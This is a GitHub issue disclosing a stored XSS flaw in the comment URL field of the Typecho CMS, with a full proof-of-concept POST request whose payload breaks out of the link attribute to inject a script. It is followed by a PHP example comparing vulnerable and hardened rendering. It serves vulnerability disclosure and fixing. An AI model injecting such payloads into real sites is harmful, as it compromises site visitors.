Typecho <= 1.2.0 Comments URL with Stored-XSS Vulnerability #1546

Closed
1manity opened this issue Mar 25, 2023 · 1 comment

Comments


1manity commented Mar 25, 2023

Affected Version
Typecho <= 1.2.0

Description
Typecho comment URLs are vulnerable to stored XSS.
1. Comment on an article, in any capacity, with an XSS payload.
2. In the comments template /usr/themes/default/comments.php, the url parameter is filtered only at its beginning, without any other protection, and is echoed directly into the HTML.
3. The XSS is triggered when the site is visited again.

POC
POST /index.php/archives/1/comment with:

author=1&mail=12%4012&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=1221&_=9d8302e080b9c139354b528787f1e5e4

The full POC request:

POST /index.php/archives/1/comment HTTP/1.1
Host: 127.0.0.1
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4

or type it directly into the website's comment form and submit it.
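The pattern the report describes (a prefix-only check on the url field, then a raw echo into an href attribute) next to a hardened rendering of the same stored value, as an added PHP example that is not Typecho's own code; the two rendering functions and their names are assumed theme snippets, and the stored input is the url payload from the POC above:

```php
<?php
// Added example, not Typecho's code. Both render functions are assumed
// theme snippets that build the comment author's link from stored fields.

// Constructed input: the url value from the issue's POC, as stored by the CMS.
$storedUrl = 'http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#';
$author    = '123';

// Vulnerable pattern as described in the report: only the start of the value
// is checked, and the rest is echoed raw inside an attribute.
function renderAuthorLinkVulnerable(string $author, string $url): string
{
    if (strpos($url, 'http://') !== 0 && strpos($url, 'https://') !== 0) {
        $url = '#';
    }
    return '<a href="' . $url . '">' . $author . '</a>';
}

// Returns the URL if it parses and uses http/https, otherwise null.
// This blocks javascript:/data: schemes; it does not by itself stop
// attribute breakout, which is handled by output encoding below.
function safeUrl(string $url): ?string
{
    $url = trim($url);
    if ($url === '' || filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) (parse_url($url, PHP_URL_SCHEME) ?? ''));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Hardened pattern: validate the whole value, then HTML-encode at output so
// quotes and angle brackets cannot close the attribute or the tag.
function renderAuthorLinkSafe(string $author, string $url): string
{
    $escAuthor = htmlspecialchars($author, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $clean = safeUrl($url);
    if ($clean === null) {
        return '<span>' . $escAuthor . '</span>';   // no valid URL: no link
    }
    $escUrl = htmlspecialchars($clean, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $escUrl . '" rel="nofollow">' . $escAuthor . '</a>';
}

echo "Vulnerable: " . renderAuthorLinkVulnerable($author, $storedUrl) . PHP_EOL;
echo "Hardened:   " . renderAuthorLinkSafe($author, $storedUrl) . PHP_EOL;
```

In the hardened output the double quotes and angle brackets of the stored value are entity-encoded, so the whole string stays inside the href attribute instead of closing the anchor and injecting a script element; a value with a non-http scheme is dropped and the author is rendered as plain text.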

@joyqi
Member

joyqi commented Mar 28, 2023

Duplicate of #1545.

@joyqi joyqi closed this as completed Mar 28, 2023